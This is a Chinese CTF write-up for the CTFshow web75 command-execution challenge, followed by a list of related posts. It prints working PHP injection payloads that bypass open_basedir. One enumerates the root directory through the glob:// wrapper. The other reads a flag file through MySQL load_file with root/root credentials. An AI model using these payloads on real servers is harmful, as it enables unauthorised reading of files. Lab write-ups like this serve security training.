目录

  • 源码
  • 思路
  • 题解
  • 总结

源码


Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 24
你要上天吗?

思路

open_basedir 限制了访问路径,uaf脚本用不了,用mysql的load_file读取文件

题解

用glob协议读取根目录

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');} exit(0);?>尝试下uaf脚本,发现提示UAF failed

用mysql的load_file读取文件

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root',
'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row)
{echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e-
>getMessage();exit(0);}exit(0);

总结

水题

CTFshow 命令执行 web75相关推荐

  1. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  2. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  3. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  4. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  5. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  6. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  7. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  8. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  9. CTFshow 命令执行 web56

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

最新文章

  1. Android接口初了解
  2. 查处的数据如何乱序_老司机总结常用镜像方法,让镜像数据更加可靠
  3. 【Matlab 控制】绘制盖尔圆
  4. Django - Python3 常用命令
  5. JS表情替换代码,这里使用字符代替图片路径
  6. Redis源代码分析之sds, 动态数组
  7. ThinkPHP的RBAC(基于角色权限控制)详解
  8. HDU 5950 Recursive sequence(矩阵快速幂)
  9. 软件系统架构师大概工作过程
  10. 固态硬盘启动计算机时间,固态硬盘10秒开机的技巧:提升SSD性能 延长寿命
  11. MEM-英语 : 单词速记整理
  12. Idea插件官网下载安装(plugins)
  13. eliteadmin网页后台管理模板简介
  14. 关于奇异值分解的一些讨论
  15. 苏宁易购财报看点:加码线上业务布局,注册会员增至6.23亿人
  16. Allegro Shape菜单详解
  17. 【收藏】桃花庵歌-唐寅
  18. IDEA连接mysql保姆级教学
  19. 动手训练属于自己的无人车,这个超强服务现已开源!
  20. 3D游戏设计读书笔记一

热门文章

  1. 博客园上看到边边的时钟,觉得很好看!推荐
  2. 推荐.NET CF控件(Resco MobileForms Toolkit)
  3. 前端遍历导致查询数据时间过长_OLAP 服务器,空间换时间可行吗?
  4. Jenkins部署Python项目实战
  5. .a 文件 和 so 文件
  6. 曾经安全难为智 除却山石不是云——山石网科举办2016年度金融用户峰会
  7. 域名转发与域名解析有什么区别?
  8. mybatis-spring 项目简介
  9. centos7+samba 安装与调试记录
  10. MySQL模拟:线上误update的恢复